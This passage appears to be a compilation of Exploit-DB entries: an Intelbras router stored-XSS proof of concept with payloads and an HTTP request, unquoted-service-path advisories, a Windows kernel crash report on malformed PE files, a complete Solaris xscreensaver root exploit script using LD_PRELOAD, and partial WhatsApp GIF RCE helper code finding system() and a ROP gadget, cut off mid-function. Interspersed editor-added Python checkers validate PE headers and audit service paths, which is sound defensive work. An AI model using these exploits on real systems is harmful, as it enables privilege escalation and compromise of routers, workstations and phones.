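The PE reports above (items 1, 3 and 4) each come down to one header field (SizeOfOptionalHeader, SizeOfImage, NumberOfSections, the Load Configuration directory RVA) that was trusted without being checked against the rest of the headers and the file. The following is an added example, not the reporters' code: a Python header-consistency check of the kind a mail gateway or file-scanning pipeline could apply before any property handler maps a PE, exercised on a constructed in-memory PE32+ image with the same kinds of field edits the reports describe (the builder, the OFF_* offsets and mutated() are all part of this example, not of the reports).

```python
import struct

DIR_LOAD_CONFIG = 10          # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
SECTION_HEADER_SIZE = 40


def check_pe_headers(data):
    """Return a list of header inconsistencies; empty means self-consistent
    (which says nothing about whether the file is trustworthy)."""
    u16 = lambda off: struct.unpack_from("<H", data, off)[0]
    u32 = lambda off: struct.unpack_from("<I", data, off)[0]
    problems, size = [], len(data)
    if size < 0x40 or data[:2] != b"MZ":
        return ["missing MZ header"]
    pe = u32(0x3C)
    if pe + 24 > size or data[pe:pe + 4] != b"PE\0\0":
        return ["e_lfanew does not point at a PE signature inside the file"]
    fh = pe + 4                                   # IMAGE_FILE_HEADER
    num_sections, size_opt = u16(fh + 2), u16(fh + 16)
    opt = fh + 20                                 # IMAGE_OPTIONAL_HEADER
    if opt + 2 > size or u16(opt) not in (0x10B, 0x20B):
        return ["unknown or truncated optional header magic"]
    dir_base = opt + (112 if u16(opt) == 0x20B else 96)   # DataDirectory[0]
    if dir_base > size:
        return ["optional header truncated by end of file"]
    size_image, size_headers, num_dirs = u32(opt + 56), u32(opt + 60), u32(dir_base - 4)

    # 1. SizeOfOptionalHeader and NumberOfSections place the section table; it must
    #    lie inside SizeOfHeaders, which must lie inside the file.
    sect_table = opt + size_opt
    sect_end = sect_table + num_sections * SECTION_HEADER_SIZE
    if size_opt < dir_base - opt or sect_end > size_headers or size_headers > size:
        problems.append("SizeOfOptionalHeader 0x%x / %d sections put the section table at "
                        "0x%x-0x%x, outside SizeOfHeaders 0x%x or the 0x%x-byte file"
                        % (size_opt, num_sections, sect_table, sect_end, size_headers, size))

    # 2. Every section must fit inside SizeOfImage (virtually) and the file (raw bytes).
    sections = []
    if sect_end <= size:
        for i in range(num_sections):
            vsize, va, raw_size, raw_ptr = struct.unpack_from(
                "<IIII", data, sect_table + i * SECTION_HEADER_SIZE + 8)
            sections.append((va, vsize, raw_ptr, raw_size))
            if va + vsize > size_image:
                problems.append("section %d ends at RVA 0x%x, beyond SizeOfImage 0x%x"
                                % (i, va + vsize, size_image))
            if raw_ptr + raw_size > size:
                problems.append("section %d raw data ends at 0x%x, beyond end of file"
                                % (i, raw_ptr + raw_size))

    def rva_to_offset(rva):
        for va, vsize, raw_ptr, raw_size in sections:
            if va <= rva < va + vsize and rva - va < raw_size:
                return raw_ptr + (rva - va)
        return None                               # not backed by any section's file data

    # 3. A data directory (here Load Configuration) must resolve to bytes that exist.
    entry = dir_base + 8 * DIR_LOAD_CONFIG
    if DIR_LOAD_CONFIG < num_dirs and entry + 8 <= min(size, opt + size_opt):
        lc_rva, lc_size = u32(entry), u32(entry + 4)
        off = rva_to_offset(lc_rva) if lc_rva else 0
        if lc_rva and (lc_rva + lc_size > size_image or off is None or off + lc_size > size):
            problems.append("Load Configuration directory RVA 0x%x (size 0x%x) is not backed "
                            "by file data" % (lc_rva, lc_size))
    return problems


def build_minimal_pe64():
    """Constructed sample: a tiny, self-consistent PE32+ image with one section and a
    Load Configuration directory (no code; it exists only to be parsed)."""
    img = bytearray(0x400)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                  # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    # IMAGE_FILE_HEADER: AMD64, 1 section, SizeOfOptionalHeader 0xF0, DLL image
    struct.pack_into("<HHIIIHH", img, 0x44, 0x8664, 1, 0, 0, 0, 0xF0, 0x2002)
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x20B)                  # PE32+ magic
    struct.pack_into("<II", img, opt + 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", img, opt + 56, 0x2000, 0x200)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, opt + 108, 16)               # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 112 + 8 * DIR_LOAD_CONFIG, 0x1000, 0x100)
    sect = opt + 0xF0                                        # first IMAGE_SECTION_HEADER
    img[sect:sect + 8] = b".rdata\0\0"
    struct.pack_into("<IIII", img, sect + 8, 0x200, 0x1000, 0x200, 0x200)  # VSize VA RawSize RawPtr
    return bytes(img)


# Field offsets inside the constructed image (FILE_HEADER at 0x44, OPTIONAL_HEADER at 0x58).
OFF_NUMBER_OF_SECTIONS, OFF_SIZE_OF_OPTIONAL_HEADER = 0x46, 0x54
OFF_SIZE_OF_IMAGE, OFF_LOAD_CONFIG_RVA = 0x58 + 56, 0x58 + 112 + 8 * DIR_LOAD_CONFIG


def mutated(img, offset, fmt, value):
    """Return a copy of img with a single header field overwritten."""
    out = bytearray(img)
    struct.pack_into(fmt, out, offset, value)
    return bytes(out)


if __name__ == "__main__":
    base = build_minimal_pe64()
    print("clean image:", check_pe_headers(base) or "no findings")
    # The same kind of edit as in report 1: SizeOfOptionalHeader inflated to 0x66E0.
    for finding in check_pe_headers(mutated(base, OFF_SIZE_OF_OPTIONAL_HEADER, "<H", 0x66E0)):
        print("mutated image:", finding)
```

Shrinking SizeOfImage below the last section's end, pointing the Load Configuration RVA outside the image, or dropping NumberOfSections to zero are each caught by the same checks, which is the filtering the reports say the kernel's own parser lacked.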
  5. # Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
     # Date: 2019-10-03
     # Exploit Author: Prof. Joas Antonio
     # Vendor Homepage: https://www.intelbras.com/pt-br/
     # Software Link: http://en.intelbras.com.br/node/25896
     # Version: 1.0.18
     # Tested on: Windows
     # CVE : CVE-2019-17411

     # PoC 1:
     1) Login to your router
     2) After signing in, go to WAN Settings
     3) Select PPPoE mode
     4) In the Service Name and Server Name field, enter any of these payloads:
        <script> alert ("Hacked") </script>
        <script> alert (1) </script>

     # PoC burp.txt
     POST /goform/AdvSetWan HTTP/1.1
     Host: TARGET
     Content-Length: 281
     Cache-Control: max-age=0
     Origin: http://TARGET
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
     Referer: http://TARGET/wan_connected.asp
     Accept-Encoding: gzip, deflate
     Accept-Language: pt-B
R,pt;q=0.9,en-US;q=0.8,en;q=0.7
     Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
     Connection: close
  6. # Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
     # Discovery Date: 2019-10-10
     # Exploit Author: Ivan Marmolejo
     # Vendor Homepage: http://www.ni.com/en-us.html
     # Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
     # Version: 14.0
     # Vulnerability Type: Local
     # Tested on: Windows 10 Pro x64 Esp
     # Version: 10.0.18362

     # Exploit.txt
     ##############################################################################
     Summary:
     Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design, simulation, validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers advanced simulation capabilities to give you a clear view of how circuits perform in any situation.

     Description:
     The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
     ##############################################################################
     Steps to discover the unquoted service:

     C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     NI Service Locator    NiSvcLoc    C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s    Auto
     ##############################################################################
     Service info:

     C:\Users\user>sc qc NiSvcLoc
     [SC] QueryServiceConfig CORRECTO

     NOMBRE_SERVICIO: NiSvcLoc
             TIPO               : 10  WIN32_OWN_PROCESS
             TIPO_INICIO        : 2   AUTO_START
             CONTROL_ERROR      : 1   NORMAL
             NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
             GRUPO_ORDEN_CARGA  :
             ETIQUETA           : 0
             NOMBRE_MOSTRAR     : NI Service Locator
             DEPENDENCIAS       :
             NOMBRE_INICIO_SERVICIO: LocalSystem
     ##############################################################################
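The wmic pipeline above finds the unquoted path by hand; the usual remediation is to quote the executable in the service's binPath. As an added example (not the advisory author's code), the following Python audit takes (service name, PathName) pairs in the shape of that output, applies the same exclusions as the advisory's findstr filters, and emits the quoted sc config command that fixes each finding. The SERVICES list is constructed for the example; only the NiSvcLoc entry comes from the advisory.

```python
import re

# Constructed input in the shape of the wmic/sc output above: (service name, PathName).
SERVICES = [
    ("NiSvcLoc", r"C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\agent.exe" --run'),     # constructed: already quoted
    ("PlainSvc", r"C:\Vendor\agent.exe -x"),                         # constructed: no spaces
    ("WinSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),       # constructed: excluded dir
]


def audit_service(name, pathname):
    """Return a finding for an unquoted image path containing spaces, else None.

    The executable is taken as the shortest prefix ending in '.exe', i.e. the
    path the vendor intended. The service control manager instead tries each
    space-delimited prefix in turn, which is why an unquoted path is a problem.
    """
    p = pathname.strip()
    if p.startswith('"'):
        return None                                  # already quoted: nothing to fix
    m = re.match(r"^(.*?\.exe)(?:\s+(.*))?$", p, re.IGNORECASE)
    if not m:
        return None
    exe, args = m.group(1), m.group(2) or ""
    # Same exclusion as the advisory's findstr /v "C:\Windows\\": the system
    # directories are ACL-protected, so a space there is not a finding.
    if " " not in exe or exe.lower().startswith("c:\\windows\\"):
        return None
    fixed = '"%s"%s' % (exe, " " + args if args else "")
    # sc.exe needs the inner quotes escaped; the result is the remediation command.
    return {"service": name, "executable": exe,
            "fix": 'sc config %s binPath= "%s"' % (name, fixed.replace('"', '\\"'))}


def audit_services(services):
    """Run audit_service over (name, pathname) pairs and return the findings."""
    return [f for f in (audit_service(n, p) for n, p in services) if f]


if __name__ == "__main__":
    for f in audit_services(SERVICES):
        print("%s: %s\n    %s" % (f["service"], f["executable"], f["fix"]))
```

On a live host the pairs would come from `wmic service get name, pathname` or the Win32_Service WMI class rather than the constructed list.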
7. We have encountered a Windows kernel crash in memcpy() called by nt!MiRelocateImage while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:

--- cut ---
*** Fatal System Error: 0x00000050
                       (0xFFFFF8017519A200,0x0000000000000000,0xFFFFF801713CF660,0x0000000000000000)

A fatal system error has occurred.

[...]

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff8017519a200, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff801713cf660, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000000, (reserved)

[...]

TRAP_FRAME:  ffffc50241846ba0 -- (.trap 0xffffc50241846ba0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffffcf84d2228de0 rbx=0000000000000000 rcx=ffffcf84d2228fb8
rdx=0000287ca2f71248 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801713cf660 rsp=ffffc50241846d38 rbp=ffffc50241846fb0
 r8=000000000000000c  r9=0000000000000001 r10=00000000ffffffff
r11=ffffcf84d2228fb8 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na pe cy
nt!memcpy+0x20:
fffff801`713cf660 488b0411        mov     rax,qword ptr [rcx+rdx] ds:fffff801`7519a200=????????????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff801714a6642 to fffff801713c46a0

STACK_TEXT:
ffffc502`41846158 fffff801`714a6642 : fffff801`7519a200 00000000`00000003 ffffc502`418462c0 fffff801`71322be0 : nt!DbgBreakPointWithStatus
ffffc502`41846160 fffff801`714a5d32 : fffff801`00000003 ffffc502`418462c0 fffff801`713d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
ffffc502`418461c0 fffff801`713bca07 : ffffce67`3399cf80 fffff801`714d0110 00000000`00000000 fffff801`71663900 : nt!KeBugCheck2+0x952
ffffc502`418468c0 fffff801`713e0161 : 00000000`00000050 fffff801`7519a200 00000000`00000000 ffffc502`41846ba0 : nt!KeBugCheckEx+0x107
ffffc502`41846900 fffff801`7127aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`7519a200 : nt!MiSystemFault+0x1d3171
ffffc502`41846a00 fffff801`713ca920 : ffffcf84`cb274000 fffff801`713c79e5 00000000`00000000 fffff801`751a0c00 : nt!MmAccessFault+0x34f
ffffc502`41846ba0 fffff801`713cf660 : fffff801`7188246d 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 : nt!KiPageFault+0x360
ffffc502`41846d38 fffff801`7188246d : 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 00000000`00000000 : nt!memcpy+0x20
ffffc502`41846d40 fffff801`717fc8a3 : ffffc502`41847180 ffffc502`41847180 ffffc502`41846fb0 ffffc502`41847180 : nt!MiRelocateImage+0x3dd
ffffc502`41846eb0 fffff801`717dca20 : ffff9d05`96f58160 ffffc502`41847180 ffffc502`41847180 ffff9d05`96f58130 : nt!MiCreateNewSection+0x5ef
ffffc502`41847010 fffff801`717dcd24 : ffffc502`41847040 ffffcf84`d24b8b00 ffff9d05`96f58160 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
ffffc502`41847100 fffff801`717dc37f : 00000000`11000000 ffffc502`418474c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
ffffc502`41847280 fffff801`717dc110 : 00000000`0828cf48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
ffffc502`41847360 fffff801`713ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
ffffc502`418473d0 00007ffb`a3edc9a4 : 00007ffb`a1c71ae7 00000000`00000000 00000000`00000001 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25
00000000`0828ced8 00007ffb`a1c71ae7 : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00000000 : ntdll!NtCreateSection+0x14
00000000`0828cee0 00007ffb`a1c75640 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
00000000`0828d110 00007ffb`a1c5c41d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
00000000`0828d180 00007ffb`a22603d1 : 00000000`055c1640 00000000`00000000 00006d1c`2a8cc01b 00007ffb`a29c643e : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
00000000`0828d1e0 00007ffb`a226035c : 00000000`00002234 00007ffb`a29cdba3 00000000`00002234 00000000`00000000 : SHELL32!_LoadVersionInfo+0x39
00000000`0828d250 00007ffb`a155c1c1 : 00000000`00000000 00000000`00000000 00000000`00000020 00000000`40040000 : SHELL32!CVersionPropertyStore::Initialize+0x2c

[...]
--- cut ---

The issue reproduces on Windows 8.1, Windows 10 and their corresponding Server editions (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html.

Due to the nature of the bug (OOB read), it could also potentially be exploited as an information disclosure primitive.

We haven't managed to significantly minimize the test cases, but we determined that the crash is related to the invalid value of the Base Relocation Table directory address in the PE headers. Attached is an archive with two proof-of-concept PE images and the corresponding original files used to generate them. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip
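The report above traces the crash to a bogus Base Relocation Table directory address (data directory 5) that nt!MiRelocateImage follows off the mapped image. The checker below is an added example from the editor, not part of the report or of its proof-of-concept archive: it parses the header fields a loader consumes and walks the relocation blocks with bounds checks, flagging a directory that would send the walk outside SizeOfImage or outside any section's data. It builds a minimal PE32+ sample of its own in build_sample_image() (constructed bytes, not one of the attached files) so it runs offline; pass a file on the command line to check a real image instead.

```python
import struct

IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_REL_BASED_ABSOLUTE = 0
# Fixup widths (bytes) for the relocation types a 64-bit loader applies.
FIXUP_WIDTH = {3: 4, 10: 8}  # IMAGE_REL_BASED_HIGHLOW, IMAGE_REL_BASED_DIR64


def parse_pe(data):
    """Read the header fields needed to validate the base relocation directory.

    Returns SizeOfImage, the (rva, size) pair of data directory 5 and the
    section table; raises ValueError when the headers are structurally broken."""
    try:
        if data[:2] != b"MZ":
            raise ValueError("missing MZ signature")
        (nt,) = struct.unpack_from("<I", data, 0x3C)           # e_lfanew
        if data[nt:nt + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        _, nsec, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", data, nt + 4)
        opt = nt + 24                                           # IMAGE_OPTIONAL_HEADER
        (magic,) = struct.unpack_from("<H", data, opt)
        if magic == 0x20B:      # PE32+: NumberOfRvaAndSizes at +108, directories at +112
            ndirs_off, dir_off = 108, 112
        elif magic == 0x10B:    # PE32:  NumberOfRvaAndSizes at +92, directories at +96
            ndirs_off, dir_off = 92, 96
        else:
            raise ValueError("unknown optional header magic 0x%x" % magic)
        (size_of_image,) = struct.unpack_from("<I", data, opt + 56)
        (ndirs,) = struct.unpack_from("<I", data, opt + ndirs_off)
        reloc = (0, 0)
        if ndirs > IMAGE_DIRECTORY_ENTRY_BASERELOC:
            reloc = struct.unpack_from("<II", data, opt + dir_off + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC)
        sections = []
        for i in range(nsec):                                   # IMAGE_SECTION_HEADER is 40 bytes
            hdr = opt + size_opt + 40 * i
            vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
            sections.append((va, vsize, raw_ptr, raw_size))
    except struct.error:
        raise ValueError("header truncated")
    return {"size_of_image": size_of_image, "reloc": reloc, "sections": sections}


def rva_to_offset(pe, rva, length):
    """File offset of [rva, rva+length) if one section's raw data backs all of it, else None."""
    for va, vsize, raw_ptr, raw_size in pe["sections"]:
        if va <= rva and rva + length <= va + min(vsize, raw_size):
            return raw_ptr + (rva - va)
    return None


def check_reloc_directory(data):
    """Return (ok, reason). ok is False when walking the directory would make a
    loader touch memory outside the mapped image, the failure mode shown above."""
    pe = parse_pe(data)
    rva, size = pe["reloc"]
    image = pe["size_of_image"]
    if (rva, size) == (0, 0):
        return True, "no base relocations"
    if size < 8 or rva + size > image:
        return False, "directory 0x%x+0x%x lies outside SizeOfImage 0x%x" % (rva, size, image)
    off = rva_to_offset(pe, rva, size)
    if off is None:
        return False, "directory 0x%x+0x%x is not backed by any section" % (rva, size)
    pos, end = off, off + size
    while pos < end:                         # one IMAGE_BASE_RELOCATION block per iteration
        if end - pos < 8:
            return False, "truncated block header at file offset 0x%x" % pos
        page, block_size = struct.unpack_from("<II", data, pos)
        if block_size < 8 or block_size & 1 or pos + block_size > end:
            return False, "block at 0x%x has SizeOfBlock 0x%x" % (pos, block_size)
        for ent in range(pos + 8, pos + block_size, 2):
            (entry,) = struct.unpack_from("<H", data, ent)
            kind, offset = entry >> 12, entry & 0xFFF
            if kind == IMAGE_REL_BASED_ABSOLUTE:
                continue                     # padding entry, applies no fixup
            if page + offset + FIXUP_WIDTH.get(kind, 2) > image:
                return False, "fixup at RVA 0x%x reaches past the image" % (page + offset)
        pos += block_size
    return True, "relocation directory is consistent"


def build_sample_image(reloc_rva=0x1000, block_size=12):
    """Constructed minimal PE32+ with one .reloc section (not a real binary).
    reloc_rva and block_size let a caller corrupt the directory on purpose."""
    img = bytearray(0x400)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                             # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x8664, 1, 0, 0, 0, 240, 0x2022)  # COFF header
    opt = 0x58                                                          # IMAGE_OPTIONAL_HEADER64
    struct.pack_into("<H", img, opt, 0x20B)
    struct.pack_into("<Q", img, opt + 24, 0x140000000)                  # ImageBase
    struct.pack_into("<II", img, opt + 32, 0x1000, 0x200)               # Section/File alignment
    struct.pack_into("<II", img, opt + 56, 0x2000, 0x200)               # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, opt + 108, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 112 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC, reloc_rva, 12)
    sec = opt + 240                                                     # first section header
    img[sec:sec + 8] = b".reloc\0\0"
    struct.pack_into("<IIII", img, sec + 8, 0x200, 0x1000, 0x200, 0x200)  # VirtualSize, VA, SizeOfRawData, PointerToRawData
    # One block for page 0x1000: a DIR64 fixup at +0x100 and an ABSOLUTE padding entry.
    struct.pack_into("<IIHH", img, 0x200, 0x1000, block_size, (10 << 12) | 0x100, 0)
    return bytes(img)


if __name__ == "__main__":
    import sys
    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    print(check_reloc_directory(target))
```

The two corruptions the sample can produce (a directory RVA past SizeOfImage, and one inside the image but outside every section) are the cases a kernel-side validator has to reject before the memcpy in the stack trace runs; the block walk additionally catches a SizeOfBlock that overruns the directory.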
8. # Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on Windows 10
# CVE : N/A

c:\>sc qc romservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: romservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : LiteManagerTeam LiteManager
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
9. # Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support
# Tested on Windows 10
# CVE : N/A

c:\>sc qc Mikogo-Service
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Mikogo-Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Mikogo-Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
10. # Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh
#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
	echo "error: problem compiling the shared library, check your gcc"
	exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
	LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -
11. # Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
 * Introduction
 * This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened,
 * by calculating the system() function address and ROP gadget address for different types of devices,
 * which then can be used to successfully exploit the vulnerability.
 * The full Android application code is available at the following link
 * https://github.com/valbrux/CVE-2019-11932-SupportApp
 */

#include <jni.h>
#include <string>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;

char *gadget_p;
void *libc, *lib;

// dl_iterate_phdr callback: record the load address of the first PT_LOAD
// segment of libhwui.so; the gadget's file offset is added to it later.
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
    int j;
    const char *base = (const char *)info->dlpi_addr;
    for (j = 0; j < info->dlpi_phnum; j++) {
        const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
        if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so", info->dlpi_name) == 0)) {
            gadget_p = (char *)base + phdr->p_vaddr;
            return 1;
        }
    }
    return 0;
}

// system address
void *get_system_address()
{
    libc = dlopen("libc.so", RTLD_GLOBAL);
    if (libc == NULL)
        return NULL;
    void *address = dlsym(libc, "system");
    return address;
}

// rop gadget address
void get_gadget_lib_base_address()
{
    lib = dlopen("libhwui.so", RTLD_GLOBAL);
    dl_iterate_phdr(dl_callback, NULL);
}

// search gadget: file offset of the first occurrence of the 12-byte
// sequence, or -1 when it is not present in this build of libhwui.so
long search_for_gadget_offset()
{
    char *buffer;
    long filelen;
    long pos = -1;

    // reading file
    FILE *fd = fopen("/system/lib64/libhwui.so", "rb");
    if (fd == NULL)
        return -1;
    fseek(fd, 0, SEEK_END);
    filelen = ftell(fd);
    rewind(fd);
    buffer = (char *)malloc(filelen);
    if (buffer == NULL || fread(buffer, 1, filelen, fd) != (size_t)filelen) {
        free(buffer);
        fclose(fd);
        return -1;
    }
    fclose(fd);

    // searching for bytes (AArch64: ldr x8,[x19,#0x18]; add x0,x19,#0x20; blr x8)
    byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
    for (long i = 0; i + (long)sizeof(g1) <= filelen; i++) {
        if (memcmp(buffer + i, g1, sizeof(g1)) == 0) {
